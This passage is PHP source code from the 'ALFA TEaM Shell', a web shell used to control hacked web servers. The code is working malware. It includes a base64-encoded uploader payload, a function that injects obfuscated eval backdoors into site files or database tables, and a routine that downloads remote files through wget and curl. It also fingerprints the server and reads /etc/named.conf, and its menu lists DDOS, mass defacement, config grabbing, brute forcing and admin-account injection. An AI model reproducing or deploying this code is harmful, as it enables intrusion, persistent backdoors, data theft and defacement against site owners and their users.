  $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
  $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
}
if ($GLOBALS['cwd'][strlen($GLOBALS['cwd']) - 1] != '/') {
  $GLOBALS['cwd'] .= '/';
}
if (!function_exists('sys_get_temp_dir')) {
  function sys_get_temp_dir() {
    foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {
      if ($temp = getenv($env_var)) {
        return $temp;
      }
    }$temp = tempnam($GLOBALS['__file_path'], '');
    if (_alfa_file_exists($temp, false)) {
      unlink($temp);
      return dirname($temp);
    }return null;
  }
}
if (!function_exists("mb_strlen")) {
  function mb_strlen($str, $c = "") {
    return strlen($str);
  }
}
if (!function_exists("mb_substr")) {
  function mb_substr($str, $start, $end, $c = "") {
    return substr($str, $start, $end);
  }
}
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\', '/', sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable('.') ? '.' : false)) : false));
function alfahead() {
  $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
  $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
  define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
  if (!isset($_POST['ajax'])) {
    function Alfa_GetDisable_Function() {
      $disfun = @ini_get('disable_functions');
      $afa = 'All Functions Accessible';
      if (empty($disfun)) {
        return($afa);
      }
      $s = explode(',', $disfun);
      $s = array_unique($s);
      $i = 0;
      $b = 0;
      $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
      $black_list = array();
      $allow_list = array();
      foreach ($s as $d) {
        $d = trim($d);
        if (empty($d) || !is_callable($d)) {
          continue;
        }
        if (!function_exists($d)) {
          if (in_array($d, $func)) {
            $dis .= $d." | ";
            $b++;
            $black_list[] = $d;
          } else {
            $allow_list[] = $d;
          }
          $i++;
        }
      }
      if ($i == 0) {
        return($afa);
      }
      if ($i <= count($func)) {
        $all = array_values(array_merge($black_list, $allow_list));
        return(''.implode(" | ", $all).'');
      }
      return(''.$dis.'Show All ('.$i.')');
    }
    function AlfaNum() {
      $args = func_get_args();
      $alfax = array();
      $find = array();
      for ($i = 1;$i <= 10;$i++) {
        $alfax[] = $i;
      }
      foreach ($args as $arg) {
        $find[] = $arg;
      }
      echo '';
    }
    if (empty($_POST['charset'])) {
      $_POST['charset'] = $GLOBALS['default_charset'];
    }
    $freeSpace = function_exists('diskfreespace') ? @diskfreespace($GLOBALS['cwd']) : '?';
    $totalSpace = function_exists('disk_total_space') ? @disk_total_space($GLOBALS['cwd']) : '?';
    $totalSpace = $totalSpace ? $totalSpace : 1;
    $on = " ON ";
    $of = " OFF ";
    $none = " NONE ";
    if (function_exists('ssh2_connect')) {
      $ssh2 = $on;
    } else {
      $ssh2 = $of;
    }
    if (function_exists('curl_version')) {
      $curl = $on;
    } else {
      $curl = $of;
    }
    if (function_exists('mysql_get_client_info') || class_exists('mysqli')) {
      $mysql = $on;
    } else {
      $mysql = $of;
    }
    if (function_exists('mssql_connect')) {
      $mssql = $on;
    } else {
      $mssql = $of;
    }
    if (function_exists('pg_connect')) {
      $pg = $on;
    } else {
      $pg = $of;
    }
    if (function_exists('oci_connect')) {
      $or = $on;
    } else {
      $or = $of;
    }
    if (@ini_get('disable_functions')) {
      $disfun = @ini_get('disable_functions');
    } else {
      $disfun = "All Functions Enable";
    }
    if (@ini_get('safe_mode')) {
      $safe_modes = "ON";
    } else {
      $safe_modes = "OFF";
    }
    $cgi_shell = "OFF";
    if (@ini_get('open_basedir')) {
      $basedir_data = @ini_get('open_basedir');
      if (strlen($basedir_data) > 120) {
        $open_b = substr($basedir_data, 0, 120)."...";
      } else {
        $open_b = $basedir_data;
      }
    } else {
      $open_b = $none;
    }
    if (@ini_get('safe_mode_exec_dir')) {
      $safe_exe = @ini_get('safe_mode_exec_dir');
    } else {
      $safe_exe = $none;
    }
    if (@ini_get('safe_mode_include_dir')) {
      $safe_include = @ini_get('safe_mode_include_dir');
    } else {
      $safe_include = $none;
    }
    if (!function_exists('posix_getegid')) {
      $user = function_exists("get_current_user") ? @get_current_user() : "????";
      $uid = function_exists("getmyuid") ? @getmyuid() : "????";
      $gid = function_exists("getmygid") ? @getmygid() : "????";
      $group = "?";
    } else {
      $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????");
      $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????");
      $user = $uid['name'];
      $uid = $uid['uid'];
      $group = $gid['name'];
      $gid = $gid['gid'];
    }
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n = count($path);
    for ($i = 0; $i < $n - 1; $i++) {
      $cwd_links .= "".$path[$i]."/";
    }
    $drives = "";
    foreach (range('a', 'z') as $drive) {
      if (@is_dir($drive.':\\')) {
        $drives .= '[ '.$drive.' ] ';
      }
    }
    $csscode = '	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
    echo '





..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..
';
    echo "







";
    $cmd_uname = alfaEx("uname -a", false, false);
    $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');
    if ($uname == "( php_uname ) Function Disabled !") {
      $GLOBALS["need_to_update_header"] = "true";
    }
    echo '









';
    for ($s = 1;$s <= 10;$s++) {
      echo '';
    }
    echo '




';
    if ($GLOBALS['sys'] == 'unix') {
      $useful_downloader = '';
      if (!@ini_get('safe_mode')) {
        if (strlen(alfaEx("id", false, false)) > 0) {
          echo '';
        } else {
          echo $useful_downloader;
          $GLOBALS["need_to_update_header"] = "true";
        }
      } else {
        echo $useful_downloader;
        $GLOBALS["need_to_update_header"] = "true";
      }
    } else {
      echo '';
    }
    $quotes = (function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0');
    if ($quotes == "1" or $quotes == "on") {
      $magic = 'ON';
    } else {
      $magic = 'OFF';
    }
    echo '';
    if ($GLOBALS['sys'] == "win") {
      echo '';
    }
    echo '



Uname:
'.$uname.'




User:
'. $uid . ' [ ' . $user . ' ]  Group: ' . $gid . ' [ ' . $group . ' ] 
alfa team 2012




PHP:
'.@phpversion(). '  Safe Mode: '.$safe_modes.'




ServerIP:
'.(!@$_SERVER["SERVER_ADDR"] ? (function_exists("gethostbyname") ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER["SERVER_ADDR"]).' Your IP: '.@$_SERVER["REMOTE_ADDR"].'




DateTime:
'.date('Y-m-d H:i:s').'




Domains:
';
    if ($GLOBALS['sys'] == 'unix') {
      $d0mains = _alfa_file("/etc/named.conf", false);
      if (!$d0mains) {
        echo "Cant Read [ /etc/named.conf ]";
        $GLOBALS["need_to_update_header"] = "true";
      } else {
        $count = 0;
        foreach ($d0mains as $d0main) {
          if (@strstr($d0main, "zone")) {
            preg_match_all('#zone "(.*)"#', $d0main, $domains);
            flush();
            if (isset($domains[1][0]) && strlen(trim($domains[1][0])) > 2) {
              flush();
              $count++;
            }
          }
        }
        echo "$count Domains";

      }
    } else {
      echo("Cant Read [ /etc/named.conf ]");
    }
    echo '




HDD:
Total:'.alfaSize($totalSpace).' Free:' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace / $totalSpace * 100) . '%]

useful:--------------
Downloader: --------------
Useful : ';
          $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
          $x = 0;
          foreach ($userful as $item) {
            if (alfaWhich($item)) {
              $x++;
              echo ''.$item.'';
            }
          }
          if ($x == 0) {
            echo "--------------";
            $GLOBALS["need_to_update_header"] = "true";
          }
          echo '




Downloader: ';
          $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
          $x = 0;
          foreach ($downloaders as $item2) {
            if (alfaWhich($item2)) {
              $x++;
              echo ''.$item2.'';
            }
          }
          if ($x == 0) {
            echo "--------------";
            $GLOBALS["need_to_update_header"] = "true";
          }
          echo '

Windows:';
      echo alfaEx('ver', false, false);
      echo '

 

Downloader: -------------


Disable Functions: '.Alfa_GetDisable_Function().'




CURL :'.$curl.' | SSH2 : '.$ssh2.' | Magic Quotes : '.$magic.' |  MySQL :'.$mysql.' | MSSQL :'.$mssql.' |  PostgreSQL :'.$pg.' |  Oracle :'.$or.' '.($GLOBALS['sys'] == "unix" ? '|  CGI : '.$cgi_shell : "").'




Open_basedir :'.$open_b.' | Safe_mode_exec_dir :'.$safe_exe.' |  Safe_mode_include_dir :'.$safe_include.'




SoftWare: 
'.@getenv('SERVER_SOFTWARE').'


DRIVE:
'.$drives.'


PWD:
'.$cwd_links.' [ Home Shell ] 









    
';
    $li = array('proc' => 'Process','phpeval' => 'Eval','sql' => 'SQL Manager','dumper' => 'Database Dumper','coldumper' => 'Column Dumper','hash' => 'En-Decoder','connect' => 'BC',
    'zoneh' => 'ZONE-H','dos' => 'DDOS','safe' => 'ByPasser','cgishell' => 'Cgi Shell','ssiShell' => 'SSI SHELL','cpcrack' => 'Hash Tools',
    'portscanner' => 'Port Scaner','basedir' => 'Open BaseDir','mail' => 'Fake Mail','ziper' => 'Compressor','deziper' => 'DeCompressor','IndexChanger' => 'Index Changer','pwchanger' => 'Add New Admin','ShellInjectors' => 'Shell Injectors',
    'php2xml' => 'PHP2XML','cloudflare' => 'CloudFlare','Whmcs' => 'Whmcs DeCoder','symlink' => 'Symlink','MassDefacer' => 'Mass Defacer','Crackers' => 'BruteForcer','searcher' => 'Searcher','config_grabber' => 'Config Grabber','fakepage' => 'Fake Page','archive_manager' => 'Archive Manager',
    'cmshijacker' => 'CMS Hijacker','remotedl' => 'Remote Upload','inbackdoor' => 'Install BackDoor','whois' => 'Whois','selfrm' => 'Remove Shell'
    );
    foreach ($li as $key => $value) {
      echo('
  • '.$value.'
    • '."\n");
    }
    echo '
Alfa SettingsAbout Us'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? 'LogOut' : '').'
 File manager
New Tab +
';
  } else {
    @error_reporting(E_ALL ^ E_NOTICE);
    @ini_set('error_log', null);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('magic_quotes_runtime', 0);
    @set_time_limit(0);
  }
}
function alfalogout() {
  @setcookie("AlfaUser", null, 2012);
  @setcookie("AlfaPass", null, 2012);
  unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
  echo("ok");
}
function showAnimation($name) {
  return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
}
function __showicon($r) {
  $s['btn'] = 'http://solevisible.com/images/btn.png';
  $s['alfamini'] = 'http://solevisible.com/images/alfamini.png';
  $s['loader'] = 'http://solevisible.com/images/loader.svg';
  //return 'data:image/png;base64,'.__get_resource($s[$r]);
  return $s[$r];
}
function alfainbackdoor() {
  alfahead();
  echo '
| Install BackDoor |
| In File | | In DataBase | 
';
  $error = 'Error In Inject BackDoor...!
File Loader is not Writable Or Not Exists...!';
  $success = 'Success...!';
  $textarea = "";
  $select = "
Use:
 ";
  $cwd = 'Example: /home/alfa/public_html/index.php';
  if ($_POST['alfa1'] == 'file') {
    echo("
| In File |
{$select} 
Backdoor Loader:
  
Key: 
  {$textarea}
");
    if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa4'] != '') {
      $method = $_POST['alfa2'];
      $file = $_POST['alfa3'];
      $shell = $_POST['alfa4'];
      $key = str_replace(array('"','\''), '', trim($_POST['alfa5']));
      if ($key == '') {
        $key = 'alfa';
      }
      if ($method == 'my') {
        $shell = __ZW5jb2Rlcg($shell);
      } else {
        $shell = $GLOBALS['__ALFA_SHELL_CODE'];
      }
      $code = '\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
      if (@is_file($file) && @is_writable($file)) {
        @file_put_contents($file, $code."\n".@file_get_contents($file));
        __alert($success."
Run With: ".basename($file)."?alfa=".$key.'');
      } else {
        __alert($error);
      }
    }
  }
  if ($_POST['alfa1'] == 'db') {
    echo("
| In DataBase |
".getConfigHtml('all')."
");
    $table = array('td1' =>
    array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
    'td2' =>
    array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
    'td3' =>
    array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
    'td4' =>
    array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
    'td5' =>
    array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
    'td6' =>
    array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
    );
    create_table($table);
    echo("
{$select}
");
    echo($textarea);
    echo("
");
    if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa5'] != '' && $_POST['alfa6'] != '') {
      $dbhost = $_POST['alfa2'];
      $dbuser = $_POST['alfa3'];
      $dbpw = $_POST['alfa4'];
      $dbname = $_POST['alfa5'];
      $file = $_POST['alfa6'];
      $method = $_POST['alfa7'];
      $shell = $_POST['alfa8'];
      $key = str_replace(array('"','\''), '', trim($_POST['alfa9']));
      if ($key == '') {
        $key = 'alfa';
      }
      if ($method == 'my') {
        $shell = __ZW5jb2Rlcg($shell);
      } else {
        $shell = $GLOBALS['__ALFA_SHELL_CODE'];
      }
      if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) {
        $code = '\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
        if (@is_file($file) && @is_writable($file)) {
          @mysqli_query($conn, 'DROP TABLE `alfa_bc`');
          @mysqli_query($conn, 'CREATE TABLE `alfa_bc` (code LONGTEXT)');
          @mysqli_query($conn, 'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
          @file_put_contents($file, $code."\n".@file_get_contents($file));
          __alert($success."
Run With: ".basename($file)."?alfa=".$key.'');
        } else {
          __alert($error);
        }
      }
    }
  }
  echo('
');
  alfafooter();
}
function alfawhois() {
  echo("
| Whois |
>');return false;\">
Url: 
  
");
  if ($_POST['alfa2'] == '>>' && !empty($_POST['alfa1'])) {
    $site = str_replace(array('http://','https://','www.','ftp://'), '', $_POST['alfa1']);
    $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
    $data = @file_get_contents($target);
    if ($data == '') {
      $get = new AlfaCURL();
      $get->ssl = true;
      $data = $get->Send($target);
    }
    $target = @json_decode($data, true);
    echo __pre();
    if (is_array($target)) {
      echo($target["whois_raw"]);
    } else {
      echo alfaEx("whois ".$site);
    }
  }
  echo("
");
}
function alfaremotedl() {
  alfahead();
  echo("
| Upload From Url |


>');return false;\">

Url: 
   


Path:
 


");
  if (isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3']) && !empty($_POST['alfa1']) && $_POST['alfa3'] == '>>') {
    echo __pre();
    $url = $_POST['alfa1'];
    $path = $_POST['alfa2'];
    echo('
');
    if (__download($url, $path)) {
      echo('Success...!');
    } else {
      echo('Error...!');
    }
    echo('
');
  }
  echo("
");
  alfafooter();
}
function __download($url, $path = false) {
  if (!preg_match("/[a-z]+:\/\/.+/", $url)) {
    return false;
  }
  $saveas = basename(rawurldecode($url));
  if ($path) {
    $saveas = $path.$saveas;
  }
  if ($content = __read_file($url)) {
    if (@is_file($saveas)) {
      @unlink($saveas);
    }
    if (__write_file($saveas, $content)) {
      return true;
    }
  }
  $buff = alfaEx("wget ".$url." -O ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("curl ".$url." -o ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("lwp-download ".$url." ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("lynx -source ".$url." > ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("GET ".$url." > ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("links -source ".$url." > ".$saveas);
  if (@is_file($saveas)) {
    return true;
  }
  $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
  if (@is_file($saveas)) {
    return true;
  }
  return false;
}
function clean_string($string) {
  if (function_exists("iconv")) {
    $s = trim($string);
    $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  }
  return $s;
}
function __read_file($file, $boom = true) {
  $content = false;
  if ($fh = @fopen($file, "rb")) {
    $content = "";
    while (!feof($fh)) {
      $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
    }
    @fclose($fh);
  }
  if (empty($content) || !$content) {
    $content = alfaEx("cat '".addslashes($file)."'");
  }
  return $content;
}
function alfaMarket() {
  echo "
";
  $curl = new AlfaCURL();
  $content = $curl->Send("http://solevisible.com/market.php");
  $data = @json_decode($content, true);
  if (!empty($data)) {
    if ($data["status"] == "open") {
      echo $data["content"];
    } else {
      echo $data["error_msg"];
    }
  } else {
    echo "
Cant connect to the alfa market....! try later.
";
  }
  echo "
";
}
function alfaSettings() {
  alfahead();
  AlfaNum(6, 7, 8, 9, 10);
  echo '
| Settings |
| Generall Setting | 
';
  if ($_POST["alfa8"] == "main") {
    echo '
| Settings |
';
    $lg_array = array('0' => 'No','1' => 'Yes');
    $penc_array = array('false' => 'No','true' => 'Yes');
    $protect_html = "";
    $icon_html = "";
    $postEnc_html = "";
    $login_html = "";
    $cgiapi_html = "";
    foreach ($lg_array as $key => $val) {
      $protect_html .= '';
    }
    foreach ($lg_array as $key => $val) {
      $icon_html .= '';
    }
    foreach ($penc_array as $key => $val) {
      $cgiapi_html .= '';
    }
    foreach ($penc_array as $key => $val) {
      $postEnc_html .= '';
    }
    $lg_array = array("gui" => "GUI","500" => "500 Internal Server Error","403" => "403 Forbidden","404" => "404 NotFound");
    foreach ($lg_array as $key => $val) {
      $login_html .= '';
    }
    echo '';
    echo '
Protect:
Cgi Api:
Post Encryption:
Show Icons:
login Page:
UserName:
Password:
';
    if ($_POST['alfa5'] == '>>') {
      echo __pre();
      if (!empty($_POST['alfa3'])) {
        $protect = $_POST['alfa1'];
        $lgpage = $_POST['alfa2'];
        $username = $_POST['alfa3'];
        $password = md5($_POST['alfa4']);
        $icon = $_POST['alfa6'];
        $post_encrypt = $_POST['alfa7'];
        $cgi_api_val = $_POST['alfa9'];
        @chdir($GLOBALS['home_cwd']);
        $basename = @basename($_SERVER['PHP_SELF']);
        $data = @file_get_contents($basename);
        $user_rand = $GLOBALS["DB_NAME"]["user_rand"];
        $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
        $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
        $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
        $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
        $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
        $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
        $find_user = '/\''.$user_rand.'\'(.*?),/i';
        $find_pw = '/\''.$pass_rand.'\'(.*?),/i';
        $find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
        $find_p = '/\''.$safemode_rand.'\'(.*?),/i';
        $icons = '/\''.$show_icons_rand.'\'(.*?),/i';
        $postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
        $cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
        if (!empty($username) && preg_match($find_user, $data, $e)) {
          $new = '\''.$user_rand.'\' => \''.$username.'\',';
          $data = str_replace($e[0], $new, $data);
        }
        if (!empty($_POST['alfa4']) && preg_match($find_pw, $data, $e)) {
          $new = '\''.$pass_rand.'\' => \''.$password.'\',';
          $data = str_replace($e[0], $new, $data);
        }
        if (!empty($lgpage) && preg_match($find_lg, $data, $e)) {
          $new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
          $data = str_replace($e[0], $new, $data);
        }
        if (!empty($find_p) && preg_match($find_p, $data, $e)) {
          $new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
          $data = str_replace($e[0], $new, $data);
        }
        if (preg_match($icons, $data, $e)) {
          $new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
          $data = str_replace($e[0], $new, $data);
        }
        if (preg_match($postEnc, $data, $e)) {
          $new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
          $data = str_replace($e[0], $new, $data);
        }
        if (preg_match($cgi_api_reg, $data, $e)) {
          $new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
          $data = str_replace($e[0], $new, $data);
        }
        if (@file_put_contents($basename, $data)) {
          echo 'UserName: '.$username.'
Password: '.$_POST['alfa4'].'';
        } else {
          __alert("File has no edit access...!");
        }
      } else {
        __alert("UserName is Empty !");
      }
    }
  } elseif ($_POST["alfa8"] == "color") {
    echo('
| Custom Color |
');
    echo '';
    $template = '';
    $x = 1;
    foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
      $multi = "";
      if (is_array($value)) {
        if (isset($value["multi_selector"])) {
          $multi = __ZW5jb2Rlcg(json_encode($value));
        }
      }
      $value = alfa_getColor($key);
      $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
      echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
    }
    echo '';

    echo '
Help
{index}
{target}:
-
*
Use Default Color:
 
';
    if ($_POST['alfa7'] == 'export') {
      echo __pre();
      $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array();
      $glob_colors = $GLOBALS["__ALFA_COLOR__"];
      $array = array();
      foreach ($glob_colors as $k => $v) {
        if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
          $v = trim($colors[$k]);
        } else {
          $v = trim(is_array($v) ? $v["key_color"] : $v);
        }
        $array[$k] = $v;
      }
      $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
      $config = json_encode($array, JSON_PRETTY_PRINT);
      if (!@file_put_contents($file, $config)) {
        echo('
Color Config:

');
      } else {
        echo('
Download Config
');
      }
    }
    if ($_POST['alfa2'] == '>>') {
      echo __pre();
      $colors = json_decode($_POST["alfa1"], true);
      $array = "";
      $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false;
      $glob_colors = $GLOBALS["__ALFA_COLOR__"];
      foreach ($glob_colors as $k => $v) {
        if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
          $v = trim($colors[$k]);
        } else {
          $v = trim(is_array($v) ? $v["key_color"] : $v);
        }
        $array .= '"'.trim($k).'" => "'.$v.'",';
      }
      @chdir($GLOBALS['home_cwd']);
      $basename = @basename($_SERVER['PHP_SELF']);
      $data = @file_get_contents($basename);
      $color = '/\'color\'(.*?)\),/s';
      if (preg_match($color, $data, $e)) {
        $new = "'color' => array(".$array."),";
        $data = str_replace($e[0], $new, $data);
        if (@file_put_contents($basename, $data)) {
          echo("
[+] Success...
");
        } else {
          echo("
[-] We Not have permission to Edit shell...!
");
        }
      } else {
        echo("
[-] Error...!
");
      }
    }
  }
  echo('
');
  alfafooter();
}
function alfaaboutus() {
  alfahead();
  echo '
';
  $news = new AlfaCURL();
  $about_us = $news->Send("http://solevisible.com/aboutus.php");
  if (empty($about_us)) {
    $about_us = "


☮ ~ PEACE ~ ☮

Shell Coded By Sole Sad & Invisible (ALFA TEaM)

Contact : solevisible@gmail.com

Telegram Channel: @solevisible

Skype : ehsan.invisible

Skype : sole.sad

Persian Gulf For Ever

Iranian Programmers

############


";
  }
  echo __pre().$about_us;
  echo('
');
  alfafooter();
}
function alfacoldumper() {
  alfahead();
  echo('
');
  AlfaNum(8, 9, 10);
  echo "

| Mysql Column Dumper |


".getConfigHtml('all')."
";
  $delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
  $selected_data = json_decode($_POST['alfa2'], true);
  $username = ($_POST['alfa3']);
  $password = ($_POST['alfa4']);
  $dbname = ($_POST['alfa5']);
  $dfile = ($_POST['alfa6']);
  $host = ($_POST['alfa7']);
  $table = array('td1' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
   'td2' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
   'td3' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
   'td4' =>
   array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
   'td5' =>
   array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
  );
  create_table($table);
  echo "
";
  $db = false;
  if (!empty($dbname)) {
    $db = @mysqli_connect($host, $username, $password, $dbname);
  }
